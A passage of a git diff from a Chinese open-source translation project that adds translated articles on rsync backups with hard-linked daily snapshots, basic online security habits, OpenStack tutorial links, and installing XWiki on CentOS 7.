[2015年的最佳搭档:tar和ssh ][6]中,我说明了昂贵的商业备份软件在设计实施可行的备份计划中并不是必要的。 + +从去年开始我尝试了另一种选择, [**rsync **][7] 命令,它有许多我已经从中得益的有趣特性。我的主要需求是从指定的地方创建备份,并且不需要解压备份压缩包就能恢复文件,以便节约创建备份的时间。 + +这篇文章的目的只是为了说明 rsync 在我的备份方案中的作用。并不是rsync的全部能力或者它的各种适用场景的概览。 + +### rsync 命令 + +Andrew Tridgell 和 Paul Mackerras 编写了 rsync ,在1996年第一次发布。它的目标是向另一台电脑同步文件。你注意到了他们为什么取这个名字了吗(remotely synchronize)?它是大多数发行版都提供的开源软件。 + +rsync不仅仅能够把一个目录同步到本地或者远程的另一个目录。它创建或者更新的目录与源目录完全一样。新的目录不是以tar,zip等打包存储,而是普通的目录和文件,常见的linux工具都能轻松访问。而这正是我所需要的。 + +rsync的最重要的特性之一是它处理远程目录与源目录中都存在的文件的方法。它使用分块校验来比较源文件和远程文件而不是把整个源文件复制过去。如果两个文件所有块的校验和相同,那么就不用传输数据。否则只有被改变的块被传输。这样节约了远程同步消耗的大量时间和带宽。比如,我第一次使用 rsync 脚本来把我所有的主机备份到一个外接usb硬盘上需要三个小时,因为所有的数据都需要传输过去。而接下来的备份需要的时间就只是3到8分钟,取决于上次备份以来创建和改变了多少文件。我使用time命令来记录实际花费的时间。昨天晚上,我只花了三分钟来从六个远程系统和本地工作站备份大概 750 Gb 数据。实际上只有在白天改变的几百Mb数据需要备份。 + +下面的命令可以用来同步两个目录和它们的任意子目录的内容。也就是说,在新目录的内容和源目录同步完之后,它们的内容完全一样。 + +`rsync -aH sourcedir targetdir` + +**-a** 选项表示归档模式,保留权限,所有者和软链接。-H选项用来保留硬链接。注意源目录和目标目录都可以在远程主机上。 + +假设昨天我们使用rsync同步了两个目录。今天我们想再同步一次,但是我们从源目录删除了一些文件。rsync默认只复制新的和改变过的文件到新目录里而不去改变新目录里被我们删除的文件,但是如果你想让那些在源目录里被删除的文件在新目录里也被删除,那么你可以加上 **--delete** 选项来删除。 + +另一个有趣的选项,也是我个人最喜欢的选项是**--link-dest**,因为它极大地增加了rsync的能力和灵活性。**--link-dest** 使每日备份只花费很少的额外空间和很短的时间。 + +用这个选项指定前一天的备份目录~~和今天的备份目录~~(!),然后 rsync 会创建今天的新备份目录,并为昨天备份目录里的每一个**未改变的**文件在今天的备份目录中创建硬链接(!)。现在我们在今天的备份目录中有一些指向昨天备份的硬链接。文件没有被重复创建,而是用硬链接代替。对于 [hard links ][8] 在Wikipedia中有非常详细的描述。而在用昨天的备份目录文件的硬链接创建了今天的备份之后,rsync 和平常一样进行备份,如果文件产生了变化,那么就从昨天的备份目录里复制变化前的文件,再把源文件中变化的部分复制过去。(原文有误(see:generator.c的try_dests_reg函数 先根据match_level选择copy或者hard link,而不是创建hard link后再判断match_level)) + +现在我们的命令类似于下面这样。 + +`rsync -aH --delete --link-dest=yesterdaystargetdir sourcedir todaystargetdir` + +你也可能想要排除一些不想要备份的目录或者文件。那么就可以使用 **--exclude** 选项。用这个选项加上你想排除文件或目录的模式。你可以用下面的新命令来排除浏览器的缓存。 + +`rsync -aH --delete --exclude Cache --link-dest=yesterdaystargetdir sourcedir todaystargetdir` + +注意:你想排除的每一个文件的模式前面都分别需要加上 exclude 选项。 + +rsync 可以同步远程主机无论作为同步源头还是目标。再举一个例子,我们假设想要把名为 remote1 的远程主机的目录同步到本地。因为 ssh 作为与远程主机交换数据的默认协议,我一直使用 ssh 选项。现在命令类似于下面这样。 + +`rsync -aH -e ssh --delete --exclude Cache --link-dest=yesterdaystargetdir remote1:sourcedir todaystargetdir` + +这就是我的 rsync 备份命令的最终版本。 + +你可以依靠 rsync 的大量选项来定制你的同步过程。大多数情况而言,我刚刚描述的简单命令就足以胜任我的个人需要。你可以阅读 rsync 的额外文档来了解它的其他能力。 + +### Performing backups 部署备份 + +我的备份自动运行因为—“万物皆可自动化”。我写了一个 BASH 脚本使用 rsync 创建每天的备份。包括确保备份介质被挂载,生成每天的备份目录的名字,以及在备份介质中创建合适的目录结构,最后执行真正的备份再卸载备份介质。 + +我用 cron 每天早晨执行脚本确保我永远不会忘记备份。 + +我的脚本 rsbu 和配置文件 rsbu.conf 可以在 https://github.com/opensourceway/rsync-backup-script上获取。 + +### 恢复测试 + +所以没有经过测试的备份计划都不是完整的。你可以通过测试某个文件或者整个目录,以确保备份在照常工作并且可以通过它来在数据全部丢失后恢复。我见过太多备份由于种种理由失败,以及由于缺乏测试忽略的问题导致宝贵的数据被丢失。 + +选择一个文件恢复到比如 /tmp 的测试目录,你就不会覆盖任何源文件。验证文件的内容是否是你预期的。恢复用 rsync 备份的文件仅仅只是找到你的备份文件然后把它复制到你想恢复的地方去那样简单。 + +我有几次不得不恢复我的个人文件,偶尔是整个目录。大多数是自己意外删除了文件或者目录。有几次是因为硬盘崩溃。这些备份迟早会派上用场。 + +### 最后一步 + +但仅仅创建备份并不能保证你的业务数据,你需要定期的地创建备份,使最近的一次备份储存在另一台异地机器上。这样可以确保大规模的灾难不会让你丢失所有备份。 + +对于小业务的一个合理选则是在可移动介质上做每日备份。在晚上把最新的备份复制到家里,第二天早上把更早的备份复制到办公室。你就会有几个轮流的拷贝。还可以把最新的备份存到银行或者保险柜里,然后带走之前的备份。(没怎么看懂 + +-------------------------------------------------------------------------------- + +作者简介: + +David Both - David Both 是居住在 Raleigh, North Carolina 的 Linux 和开源提倡者。他已经从事IT行业40多年。在IBM教授 OS/2 20多年。在IBM的时候,他在1981年为最初的IBM个人电脑编写了第一门训练课程。他为红帽教授RHCE课程,并曾在世通公司,思科,北卡罗来纳州政府工作。他使用Linux和开源软件已经有20年左右了。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/rsync-backup-linux + +作者:[David Both][a] +译者:[trnhoe](https://github.com/trnhoe) +校对:[校对者ID](https://github.com/校对者ID) Thank you~ + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/dboth +[1]:https://opensource.com/article/17/1/rsync-backup-linux?rate=xmBjzZgqTu6p-Dw2gXy5cq43KHcSNs4-nisv_jnUgbw +[2]:https://www.flickr.com/photos/wwarby/11644168395 +[3]:https://www.flickr.com/photos/wwarby/11644168395 +[4]:https://opensource.com/users/jason-baker +[5]:https://creativecommons.org/licenses/by/2.0/ +[6]:https://opensource.com/business/15/12/best-couple-2015-tar-and-ssh +[7]:https://en.wikipedia.org/wiki/Rsync +[8]:https://en.wikipedia.org/wiki/Hard_link +[9]:https://github.com/opensourceway/rsync-backup-script +[10]:https://opensource.com/user/14106/feed +[11]:https://opensource.com/article/17/1/rsync-backup-linux#comments +[12]:https://opensource.com/users/dboth diff --git a/translated/tech/20170130 4 ways to improve your security online right now.md b/translated/tech/20170130 4 ways to improve your security online right now.md new file mode 100644 index 0000000000..8beb5ff901 --- /dev/null +++ b/translated/tech/20170130 4 ways to improve your security online right now.md @@ -0,0 +1,89 @@ +立即提高在线安全的四种方法 +============================================================ + + ![4 ways to improve your security online right now](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/rh_003601_05_mech_osyearbook2016_security_cc.png?itok=VNmpz6K- "4 ways to improve your security online right now") +图片提供 : Opensource.com + +过去几年来,关于数字安全漏洞和个人隐私问题的报告频率大幅上升,毫无疑问,这一趋势仍将继续。我们时常听说诈骗者转移到社交媒体,国家使用网络攻击作为协调进攻策略的一部分,以及追踪我们在线行为的公司挣到大钱,快速崛起。 + +对这些事件冷漠对待非常容易,但是你可以做很多事情来提高你的在线安全,这样当你被安全事件所困时,可以减少自己的风险,并快速保护自己免受进一步的损失。安全意识非常容易学习,并且许多开源项目可以帮助你。 + +安全的重点不是将你的计算机变成一个虚拟的 Fort Knox(LCTT译注:Fort Knox 是一个美军基地,固若金汤之意),而是为了使别人访问你的数据足够困难,这样攻击者将转移到其他更容易的目标。 + +### 使用密码管理器 + +在一个几乎每个网站都要求用户名和密码的世界里,大多数人都因密码而疲惫不堪,于是开发了复杂的系统来创建和记住用户名和密码(或者干脆完全放弃,只是使用相同的用户名和密码)。密码管理器是这个问题的解决方案,我还不知道不使用密码管理器的专业安全人员。此外,它们非常容易设置和使用。 + +对于以前没有使用过的人来说,密码管理器是一种软件,它就像一个信息的数字保险库,将信息存储在加密环境中。你创建的主密码是一个单一的强密码,用于保护包含用户名和密码集合的保险库。通常,当你连接到已知网站,密码管理器会自动输入存储的密码,生成强密码并允许你存储其他信息。 + +有大量的密码管理器可用,其中许多是自由及开源的解决方案。我在 Windows 上用过 [KeePass][4],在 Linux 和 MacOS 上用过[KeePassX][5],我推荐使用他们作为开始。(这里还有三个[开源密码管理器][6],你可以尝试一下。) + +然而,每个人应该选择他自己的最佳解决方案。某些密码管理器除了本地存储之外还具有云存储的功能,如果你使用多个设备,这将非常有用。更受欢迎的管理器更有可能被维护并接受定期的安全更新。一些密码管理器集成双因子认证功能,我强烈建议你启用它。 + +大多数密码管理器都没有恢复忘记的主密码的功能。所以要明智地选择并确保主密码是你可以记住的。 + +### 使用 VPN 提高共享网络的安全性 + +虚拟专用网络(VPN)允许计算机通过共享网络发送和接收数据,就像它通过端到端加密直接与专用网络上的服务器通信一样。 + +您可能熟悉在办公室外工作时连接到公司内部网的过程。在咖啡馆或饭店使用连接到公共网络的 VPN,会保护你的通信数据不被公网上其他人看到,不过它无法阻止 VPN 供应商看到通信数据,而且确实存在不良 VPN 提供商收集和销售数据的现象。VPN 提供商也可能受到来自政府或执法机构的压力,将您通过其网络发送的数据信息传出。 因此,请记住,如果您正在进行非法活动,VPN 将不会保护你。 + +当选择 VPN 提供商时,请考虑其运营所在的国家,因为这关系到它所受约束的法律,有时甚至非常无关痛痒的活动都可能使您陷入困境。 + +[OpenVPN][7] 是一个免费和开源的 VPN 协议,可在大多数平台上使用,并已成为最广泛使用的 VPN 之一。 您甚至可以托管您自己的 OpenVPN 服务器 -- 只是要小心,注意其安全性。如果您更希望使用 VPN 服务,请记住许多声誉良好的提供商都想要您的业务。 + +有些是收费的,如 [ExpressVPN][8],[NordVPN][9] 或 [AirVPN][10]。一些提供商提供免费服务,但是,我强烈建议您不要使用它们。 请记住,当您使用免费服务时,您的数据就是产品。 + +### 浏览器扩展程序是您的朋友 + +虽然互联网浏览器有一些内置的安全工具,但是扩展仍然是提升您的隐私和安全的好方法。有很多种类的扩展,但哪些扩展是适合你的? 这可能取决于你使用互联网的主要目的和你对技术的掌握程度。作为基线,我会使用以下扩展: + +* [Privacy Badger][1]:这个扩展,由 EFF 开发,阻止间谍广告和隐蔽的跟踪。它通过在流量请求中放置一个 Do Not Track 头,然后评估流量仍被跟踪的可能性。如果这种可能性很高,它会阻止来自该域的进一步流量(除非你另有说明)。扩展在 GNU GPL v3 下获得许可。 +* [HTTPS Everywhere][2]:它是 EFF 和 Tor 项目之间的联合协作,此扩展确保尽可能自动使用 HTTPS。这很重要,因为它意味着您给定域的网络流量是加密的,而不是明文,从而提供隐私,并确保交换数据的完整性。扩展在 GNU GPL v3 下获得许可。 + +### 不要忘记旧帐户 + +你还记得 Bebo,iTunes Ping,Del.icio.us,Digg,MySpace 或 Friendster 吗?它们上面你有帐户吗?你关闭了帐户还是仅仅停止使用帐户?你曾经停下来想一想什么信息可能在这些网站上吗?是不是忘记了? + +旧的社交媒体帐户可以是那些收集数据的人的金矿,包括营销人员,欺诈者和黑客等。他们可以使用这些信息来构建您的个人信息,这些信息通常可以揭示一些重要信息,在密码重置中用于鉴别,例如您的第一只宠物的名字或您的第一辆车。 + +某些网站可能会让删除帐户变得困难或实际上不可能。[Justdelete.me][11] 是一个很好的资源,在这里可以找到各种平台上如何删除社交媒体帐户的操作说明。如果你正在寻找的网站不在那里,而且你自己找到了删除帐户的方法,你可以在 GitHub 上为该项目做贡献。如果您不确定您可能已忘记的社交媒体帐户,[Knowem.com][12]允许您按用户名搜索大量的社交网络。搜索工具也可能误报,而且你可能不是曾经使用特定用户名的唯一的人,但它是一个很好的开始,尽管不是开源的。 + +如果您不确定您可能使用的旧用户名,Google 是一个很好的资源。尝试搜索旧昵称和电子邮件地址,你可能会对你发现的事感到惊讶。 + +### 总结 + +无论数字安全的任务如何巨大,你都可以在开始使用时打下坚实的基础。记住,安全是一个持续的过程,而不是一种状态。保持您使用的工具最新,定期检查您的习惯和工具,确保您的安全尽可能的好。如果你每次一步一步的改变,安全就不会过于复杂。 + +-------------------------------------------------------------------------------- + +作者简介: + +Tiberius Hefflin - Tibbs 最近毕业于苏格兰西部大学,获得计算机安全学位。她已搬迁到波特兰,在为波特兰通用电气公司做安全保证工作。 她热衷于鼓励小孩子踏上 STEM(LCTT 译注:即 科学 Science,技术 Technology,工程 Engineering,数学 Mathematics)。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/4-ways-improve-your-online-security + +作者:[Tiberius Hefflin][a] +译者:[livc](https://github.com/livc) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/whatatiberius +[1]:https://www.eff.org/privacybadger +[2]:https://www.eff.org/Https-everywhere +[3]:https://opensource.com/article/17/1/4-ways-improve-your-online-security?rate=sa9kEW1QXWaWvvq4F5YWv2EhiAHVDoWOqzZS2a95Uas +[4]:http://keepass.info/ +[5]:https://opensource.com/business/16/5/keepassx +[6]:https://opensource.com/article/16/12/password-managers +[7]:https://openvpn.net/ +[8]:https://www.expressvpn.com/ +[9]:https://nordvpn.com/ +[10]:https://airvpn.org/ +[11]:http://backgroundchecks.org/justdeleteme/ +[12]:http://knowem.com/ +[13]:https://opensource.com/user/108496/feed +[14]:https://opensource.com/article/17/1/4-ways-improve-your-online-security#comments +[15]:https://opensource.com/users/whatatiberius diff --git a/translated/tech/20170131 5 new guides for working with OpenStack.md b/translated/tech/20170131 5 new guides for working with OpenStack.md new file mode 100644 index 0000000000..a216e0d436 --- /dev/null +++ b/translated/tech/20170131 5 new guides for working with OpenStack.md @@ -0,0 +1,55 @@ +5 个新的 OpenStack 使用指南 +============================================================ + + ![OpenStack tutorials](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/rh_003588_01_rd3os.combacktoschoolserieshe_rh_051x_0.png?itok=Tm2UcSXw "OpenStack tutorials") +图片提供:opensource.com + +随着越来越多的组织寻求构建和管理自己的开源云,OpenStack 经验继续保持为技术世界中最需要的技能。但是 OpenStack 是一个巨大的知识领域,包含了十几个正在积极开发的单独项目。仅仅使你的技能跟上最新发展就是一个挑战。 + +好消息是现在有很多资源可以让你跟上这个发展速度。除了[官方项目文档][9],各种培训和认证程序、印刷的指南和其他资源,还有大量的由 OpenStack 社区成员编写并发布在各种博客和线上出版物上的教程和指南。 + +在 Opensource.com,我们每个月都会收集这些社区资源中最好的资源,并将它们放到一个集锦中。这是我们上个月的内容。 + +*   这次排第一位的是 Julie Pichon 对[ Mistral 在 TripleO 中的使用][1]的一个快速介绍。Mistral 是一个工作流服务,允许你设置一个多步过程自动化和异步协调操作。在本快速指南中学习 Mistral 的基础知识、它如何工作,以及如何在 TripleO 中使用它。 + +*   想要使用 OpenStack 自己的一套工具来深入了解 TripleO 管理 OpenStack 部署么?你会想看看这[一组为使用 TripleO 设置 OpenStack 的人士写的简洁提示][2]。这是一个正在进行的工作,所以如果你还想包含什么,欢迎随时贡献。 + +*   不要错过 使用 TripleO 设置独立的 Ceph 部署这个[快速指南][3],我们的 TripleO 指南的第三篇。它所需要的只是一个简短的 YAML 文件和一个简单的命令。 + +*   接下来,如果你是一个 OpenStack 贡献者,你可能会熟悉[ Grafana 面板][4],它显示了 OpenStack 持续集成基础设施的各种指标。有没有想过这个服务如何工作,或想创建一个新的指标到面板上?学习为了测试[如何创建][5]你自己的本地面板的副本,这样你可以随便玩玩,并创建自己的修改。 + +* 有没有想过 OpenStack 云上的网络发生了什么?OpenStack 经常使用[ Open vSwitch ][6]用于 Neutron 和 Nova 的网络服务;在[这个演练][7]中学习设置的基础。 + +* * * + +这次就是这样了。和往常一样,请查看我们完整的[ OpenStack 教程][10],它汇集了过去三年发布的数百个单独的指南。 + +-------------------------------------------------------------------------------- + +作者简介: + +Jason Baker - Jason 热衷于使用技术使世界更加开放,从软件开发到给当地政府带来阳光。Linux 桌面爱好者。地图/地理空间书呆子。树莓派工匠。数据分析和可视化 geek。偶尔的码农。 云本土主义者。在 Twitter 上关注他。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/openstack-tutorials + +作者:[Jason Baker][a] +译者:[geekpi](https://github.com/geekpi) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jason-baker +[1]:http://www.jpichon.net/blog/2016/12/quick-introduction-mistral-tripleo/ +[2]:http://www.anstack.com/blog/2016/12/16/printing-tripleo-cheat-sheet.html +[3]:http://giuliofidente.com/2016/12/tripleo-to-deploy-ceph-standlone.html +[4]:http://grafana.openstack.org/ +[5]:http://blog.cafarelli.fr/2016/12/local-testing-of-openstack-grafana-dashboard-changes/ +[6]:http://openvswitch.org/ +[7]:http://superuser.openstack.org/articles/openvswitch-openstack-sdn/ +[8]:https://opensource.com/article/17/1/openstack-tutorials?rate=q5H-KT2pm4NLExRhlHc0ru2dyjLkTSA45wim_2KtIec +[9]:http://docs.openstack.org/ +[10]:https://opensource.com/resources/openstack-tutorials +[11]:https://opensource.com/user/19894/feed +[12]:https://opensource.com/users/jason-baker diff --git a/translated/tech/20170212 How to Build Your Own Wiki with XWiki on CentOS.md b/translated/tech/20170212 How to Build Your Own Wiki with XWiki on CentOS.md new file mode 100644 index 0000000000..0007176242 --- /dev/null +++ b/translated/tech/20170212 How to Build Your Own Wiki with XWiki on CentOS.md @@ -0,0 +1,150 @@ +如何在 CentOS 中用 XWiki 构建你自己的 Wiki +============================================================ + +由于大家的强烈要求,这里有另外一篇在 CentOS 7 服务器中用 XWiki 安装 wiki 的教程。我们已经发布了一篇[如何在 Ubuntu 中安装 DokuWiki][8]的教程,但如果你需要一个 DokuWiki 的替代品,XWiki 是一个很好的选择。 + +### XWiki 信息 + +首先最重要的是:它是免费且开源的!这是一些 XWiki 的功能: + +* 一个非常强大的 WYSIWYG 编辑器 +* 强大的 wiki 语法 +* 强大的权限管理 +* 响应式皮肤 +* 高级搜索 +* 独特的应用程序集 +* 还有更多功能。。。 + +### 为何使用 XWiki? + +已经开发了 10 多年,XWiki 被许多知名公司使用作为: + +* 知识库 +* 协作内部网 +* 公共网站 +* 业务程序 +* 其他等。。。 + + +### XWiki 要求 + +* Java 8或更高版本 +* 支持 Servlet 3.0.1 的 Servlet 容器 +* 用于数据库的 JDBC 4 驱动程序 +* 至少 2GB RAM(对于较小的 wiki 是 1GB) +* 你可以用 $10 从 [Linode][1] 买到 2GB RAM VPS。但是,它是[非管理][2]的 VPS。如果你想要一个[管理 VPS][3],你可以搜索一下供应商。如果你得到一个管理 VPS,他们可能会为你安装 XWiki。 + +我们将在本教程中使用 CentOS 7 服务器。 + +### CentOS 7 中 XWiki 安装指南 + +让我们开始吧。首先登录 CentOS VPS,更新你的系统: + +``` +yum update +``` + +如果你还没有安装 nano 和 wget,就先安装: + +``` +yum install nano wget +``` + +### 安装 Java + +XWiki 基于并运行于 Java,因此我们需要安装 Java。要安装它,运行下面的命令: + +``` +yum install java +``` + +要验证是否已经成功安装,运行: + +``` +java -version +``` + +### 下载并安装 XWiki + +目前,XWiki 最新的版本是 8.4.4,如果还有更新的版本,你可以用更新命令更新。 + +要下载 XWiki 安装器,运行: + +``` +wget http://download.forge.ow2.org/xwiki/xwiki-enterprise-installer-generic-8.4.4-standard.jar +``` + +要运行安装器,输入下面的命令: + +``` +java -jar xwiki-enterprise-installer-generic-8.4.4-standard.jar +``` + +现在,安装器会有提示地询问你几个问题,分别输入 1(接受)、2(退出)、3(重新显示)。大多数提示可以回答 1(接受)。这个安装器非常自我解释并且容易理解,因此只要遵循下面的指导。 + +### 启动 XWiki + +要启动 XWiki,你需要进入你先前选择的目录: + +``` +cd /usr/local/"XWiki Enterprise 8.4.4" +``` + +并运行脚本: + +``` +bash start_xwiki.sh +``` + +等待脚本执行完毕就行了。XWiki 已经安装并已启动。就是这么简单。 + +现在你可以在 8080 端口上通过域名或者服务器 IP 访问 XWiki 了: + +``` +http://server-ip:8080 +``` + +或者 + +``` +http://example.com:8080 +``` + +XWiki 默认运行在 8080 端口,但如果你想要使用 80 端口,确保没有其他程序运行在 80 端口,并用下面的命令启动 XWiki: + +``` +bash start_xwiki.sh -p 80 +``` + +现在你可以不用指定端口访问 XWiki 了。当你访问时,你应该会看见默认的 XWiki 主页,类似于这样: + + ![xwiki start page](https://thishosting.rocks/wp-content/uploads/2017/02/xwiki-starting-page.jpg.webp) + +XWiki 默认的管理员用户及密码为: + +``` +用户名: Admin +密码: admin +``` + +使用它们登录并访问管理面板。祝你在新的 wiki 中使用愉快! + +-------------------------------------------------------------------------------- + +via: https://thishosting.rocks/how-to-build-your-own-wiki-with-xwiki-on-centos/ + +作者:[thishosting.rocks][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://thishosting.rocks +[1]:https://thishosting.rocks/go/linode +[2]:https://thishosting.rocks/cheap-cloud-hosting-providers-comparison/ +[3]:https://thishosting.rocks/best-cheap-managed-vps/ +[4]:https://thishosting.rocks/category/knowledgebase/ +[5]:https://thishosting.rocks/tag/wiki/ +[6]:https://thishosting.rocks/tag/xwiki/ +[7]:https://thishosting.rocks/2017/02/12/ +[8]:https://thishosting.rocks/build-your-own-wiki-on-ubuntu-with-dokuwiki/ diff --git a/translated/tech/LXD/Part 11 - LXD 2.0--LXD and Juju.md b/translated/tech/LXD/Part 11 - LXD 2.0--LXD and OpenStack.md similarity index 100% rename from translated/tech/LXD/Part 11 - LXD 2.0--LXD and Juju.md rename to translated/tech/LXD/Part 11 - LXD 2.0--LXD and OpenStack.md